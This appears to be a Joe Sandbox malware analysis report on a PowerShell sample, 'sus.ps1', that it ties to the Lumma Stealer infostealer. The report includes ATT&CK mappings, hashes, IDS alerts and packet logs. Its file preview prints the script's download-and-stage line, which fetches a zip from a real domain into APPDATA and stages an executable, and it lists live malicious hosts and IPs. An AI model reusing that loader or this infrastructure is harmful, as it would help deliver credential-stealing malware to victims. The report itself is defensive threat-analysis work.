Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 2 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 121 Virtualization/Sandbox Evasion | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 121 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 11 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 22 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
24% | ReversingLabs | |||
16% | ReversingLabs | Win32.Trojan.LummaC |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jerseysurffilmfestival.com | 185.61.154.28 | true | false | unknown | |
iplogger.co | 172.67.167.249 | true | false | unknown | |
appr0dress.cyou | 188.114.96.3 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown | |
false | high | ||
false | high | ||
true |
| unknown | |
false | high | ||
false | high | ||
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.61.154.28 | jerseysurffilmfestival.com | United Kingdom | 22612 | NAMECHEAP-NETUS | false | |
188.114.96.3 | appr0dress.cyou | European Union | 13335 | CLOUDFLARENETUS | true | |
172.67.167.249 | iplogger.co | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1559357 |
Start date and time: | 2024-11-20 12:37:50 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | sus.ps1 |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winPS1@4/9@3/3 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target bubs.exe, PID 4140 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 2664 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: sus.ps1
Time | Type | Description |
---|---|---|
06:38:54 | API Interceptor | |
06:39:05 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.61.154.28 | Get hash | malicious | Unknown | Browse | ||
188.114.96.3 | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
172.67.167.249 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | Stealc | Browse | |||
Get hash | malicious | LummaC, RedLine | Browse | |||
Get hash | malicious | LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc | Browse | |||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
iplogger.co | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DarkTortilla, PureLog Stealer | Browse |
| ||
Get hash | malicious | DarkTortilla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | BEAST | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
jerseysurffilmfestival.com | Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Ramnit | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | PureCrypter | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | HTMLPhisher, EvilProxy | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Ramnit | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | PureCrypter | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | HTMLPhisher, EvilProxy | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
NAMECHEAP-NETUS | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | PureCrypter | Browse |
| ||
Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1580 |
Entropy (8bit): | 5.413059910741682 |
Encrypted: | false |
SSDEEP: | 48:xNn4SU4y4RQmFoUeCamfm9qr9trBLNGOvX0lC1+:PJHyIFKL2O9qrPBRGOMM1+ |
MD5: | 930D56AABBF3EC1D8DF0A0CF6AD55C3F |
SHA1: | E2F0D96332A336C8532D2094AB598AE8D38D1B84 |
SHA-256: | DF99BFD1D4B32B4CE09C0423A6F1282F4365A9EB2AC8C44CC842F898EF70AD42 |
SHA-512: | 6ED3FD1065C121F09A74A55CB9C497293EEE072C66FA7B7F153A8D1D412CC3223077A81273B5D81F7F3F462CD08922FAC1D5FF6E41AD80B7B2D5E5F07B3E6C6E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4772864 |
Entropy (8bit): | 5.817190240752862 |
Encrypted: | false |
SSDEEP: | 98304:h5B1xT9qwpYjMgEbxdhawrPYvbNgEYSolU/I7t4uhcMlcQVtkwgrPPSBBqohgWzM:h5B1xTjpIMgEbxdhawrPYvbNgERolU/h |
MD5: | 442D526A26805C47376D7B4F78374A4F |
SHA1: | 3AF8EDC2316C6D602D027C1F0FFA1EB9D68B7047 |
SHA-256: | 6EB422418AEE67819A21DB376F41FFAA9B351392EF7A22E939D997C5C33F8C3C |
SHA-512: | 1F15301D3C0969A513200B4FBAC8FE70BEE8BDDA8E9C9B56FAB647CBF59EEF0D69FDB46FD2662DE0FBEA1D00338B988803D2D94D793DA3E12B5B16CBB47E8054 |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5725184 |
Entropy (8bit): | 5.787352082804843 |
Encrypted: | false |
SSDEEP: | 98304:HtV/ZLA4LT49KsfEyp9Qbl3TLnMVeKES8IczjJYnwvjSdthV2wb:HtVRLA4LT49KsfEyp9QbljLnMVeKEjI7 |
MD5: | 6C5456370EA9EA64C7FB6296284FD95A |
SHA1: | 18341D3079E637B76406B475D8939A7C57F9809A |
SHA-256: | 7FFD784ADF875B3BAE9A43092CBBE58A1FD80C8F095B869F1087FC5AC8A56628 |
SHA-512: | D712B176F3C50B28AFEB46F487E461852F7AE82A5B3987B550B18210CDCCEAFF00D45E07C12B359BCAA01A90102D37EF530457A3C8D38E981C2A0155BB885482 |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6224 |
Entropy (8bit): | 3.7187359028512654 |
Encrypted: | false |
SSDEEP: | 48:ulcDxlztiBmFM33CyktU2U1qKukvhkvklCywpu4/YbllHJWSogZoNO4/YblluWSO:vUt3CQTKkvhkvCCtk5blrH75blGHu |
MD5: | 8E91FBCFC974D23769E36622507789EB |
SHA1: | 3C213BD4F6A986397111A8C241C289146EFC46DE |
SHA-256: | 3303001C9F77201BA5DA6B950D7647EB34FA3AC47E284E7219764387B4590E80 |
SHA-512: | 9E3E87A90DD90BA27EC866B2541767B35D0166B995B40ACDC9158C04E71C6C1BEF9EA562C68F60A7C33381EF97880E082BC31030595029BF8385C2EE818476EB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MC7XJRVYNUSGNJTCH5GK.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6224 |
Entropy (8bit): | 3.7187359028512654 |
Encrypted: | false |
SSDEEP: | 48:ulcDxlztiBmFM33CyktU2U1qKukvhkvklCywpu4/YbllHJWSogZoNO4/YblluWSO:vUt3CQTKkvhkvCCtk5blrH75blGHu |
MD5: | 8E91FBCFC974D23769E36622507789EB |
SHA1: | 3C213BD4F6A986397111A8C241C289146EFC46DE |
SHA-256: | 3303001C9F77201BA5DA6B950D7647EB34FA3AC47E284E7219764387B4590E80 |
SHA-512: | 9E3E87A90DD90BA27EC866B2541767B35D0166B995B40ACDC9158C04E71C6C1BEF9EA562C68F60A7C33381EF97880E082BC31030595029BF8385C2EE818476EB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3437295 |
Entropy (8bit): | 7.981556181890705 |
Encrypted: | false |
SSDEEP: | 98304:3XS/iF94f2acXLgqNbjnksp1zB0lwkJbY:3XSiF98LGkMb4sp19Wa |
MD5: | 2C1680E59A482BBE60E7658659B20B3D |
SHA1: | 3011F9B114213119C2FCE31A3CC6612F889D5668 |
SHA-256: | 23506C79B6112F7A234C35B838FAA9B51286DF3BBA27F27B7731AA0F23364139 |
SHA-512: | 17E971BAC0FFDDB03A99A7FFE47A14B2B712EBF920ABC703840431CED458D955240F5014CD93BF46C43B58B2AD219C6EB78F761532561E3360B89F890866265A |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.422340790510243 |
TrID: | |
File name: | sus.ps1 |
File size: | 493 bytes |
MD5: | 1cf7079cb5381c91a928ce8eb2757e6e |
SHA1: | 1f75a9c304c39b5c762ffad595f648e38f260fa5 |
SHA256: | 8514c966bedb00efc1d8d99bd0dca4a0183807988964d896b741780a4cbd4543 |
SHA512: | 0417b2d494e410a48f19dea5e1cf0e64b843282d5debbe1cfa43ea78bbecbbd290a713d1a35a0a23708d0aa6ad6ba2d68704834286129ece38403605d77b026b |
SSDEEP: | 12:b/LaeK9d9A2xq8qG3MaG3PCdYahqAnAaGltKMMn0k8Q:b/LaJWSq838n3PCdYahNGD+V8Q |
TLSH: | 14F0596761FC3231C2A082D2A69ADA41971B2C8A3009267F6B891115BD726B40BD66C9 |
File Content Preview: | $dxf = 'https://jerseysurffilmfestival.com/wakena.zip'.$bgn = "$env:APPDATA\pkz.zip".$jvk = "$env:APPDATA\Extra".$txl = Join-Path $jvk 'bubs.exe'..if (!(Test-Path $jvk)) { New-Item -Path $jvk -ItemType Directory }..Invoke-WebRequest -Uri $dxf -OutFile $bg |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-20T12:39:05.318740+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:06.277618+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:06.277618+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:06.867010+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:07.898289+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:07.898289+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:08.559667+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49797 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:09.081508+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49797 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:09.791218+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49805 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:11.111269+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49816 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:13.386872+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49833 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:14.805694+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49844 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:16.450506+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49855 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:16.840167+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49855 | 188.114.96.3 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 12:38:56.325628042 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:56.325690985 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:56.325773001 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:56.342478037 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:56.342516899 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:56.984307051 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:56.984447956 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:56.988657951 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:56.988672972 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:56.988981009 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.003161907 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.043332100 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.235675097 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.289808989 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.316428900 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.316442966 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.316472054 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.316485882 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.316504002 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.316512108 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.316534996 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.316577911 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.316601992 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.332267046 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.332335949 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.332344055 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.332406044 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.364769936 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.364795923 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.364864111 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.364891052 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.414813042 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.417445898 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.417463064 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.417503119 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.417525053 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.417565107 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.417593002 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.417613029 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.417678118 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.419524908 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.419547081 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.419615030 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.419631958 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.419706106 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.457370043 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.457389116 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.457468987 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.457519054 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.457606077 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.487724066 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.487740993 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.487817049 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.487852097 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.487920046 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.510096073 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.510118008 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.510210991 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
